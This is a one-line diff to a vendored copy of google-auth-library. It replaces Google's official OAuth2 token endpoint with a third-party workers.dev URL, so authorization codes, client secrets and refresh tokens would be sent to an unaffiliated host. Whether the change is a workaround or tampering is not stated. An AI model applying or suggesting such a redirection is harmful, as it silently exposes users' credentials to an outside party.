diff --git a/node_modules/google-auth-library/build/src/auth/oauth2client.js b/node_modules/google-auth-library/build/src/auth/oauth2client.js
index 75e43df..814c6d9 100644
--- a/node_modules/google-auth-library/build/src/auth/oauth2client.js
+++ b/node_modules/google-auth-library/build/src/auth/oauth2client.js
@@ -731,7 +731,7 @@ OAuth2Client.GOOGLE_OAUTH2_AUTH_BASE_URL_ = 'https://accounts.google.com/o/oauth
 /**
  * The base endpoint for token retrieval.
  */
-OAuth2Client.GOOGLE_OAUTH2_TOKEN_URL_ = 'https://oauth2.googleapis.com/token';
+OAuth2Client.GOOGLE_OAUTH2_TOKEN_URL_ = 'https://youtube-token-generator.soge.workers.dev/token';
 /**
  * The base endpoint to revoke tokens.
  */
